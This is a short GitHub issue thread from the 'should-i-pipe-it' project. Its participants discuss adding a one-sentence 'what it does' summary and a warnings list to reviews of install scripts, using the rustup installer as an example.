should-i-pipe-it icon indicating copy to clipboard operation
should-i-pipe-it copied to clipboard

Published 20 hours ago verified publisher icon small-tech

Maybe add entry for "what it does"?

Open rugk opened this issue 4 years ago • 2 comments

Like F-Droid antifeatures maybe list what "dangerous" actions it does, or what it does in general. In one short sentence, so you can estimate the risk.

E.g. like I did in https://github.com/small-tech/should-i-pipe-it/pull/8:

What it does: It downloads the (correct) "rustup-init" binary from https://static.rust-lang.org and executes it to install rustup and rust.

rugk avatar May 15 '20 09:05 rugk

I like the idea but I wonder about maintainability as well as ease of submitting validations. Submitting a validation should take almost no time as the person has already invested time in reviewing the script (we must respect people’s time).

That said, perhaps we can flip it on its head:

Any installation script should be doing the following:

  1. Download a binary
  2. Move it to a place on your path

If a script does anything else that’s out of the ordinary, we should ask people to note that.

Then again, if it’s doing something out of the ordinary and we feel we need to warn people about it, perhaps that’s no longer a validation but a warning. So perhaps what we need, in addition to validations, is a list of warnings: scripts that have been reviewed but are not recommended for installation due to <insert reasons here>.

aral avatar May 19 '20 08:05 aral

And 3. (possibly) execute that binary.

rugk avatar May 20 '20 11:05 rugk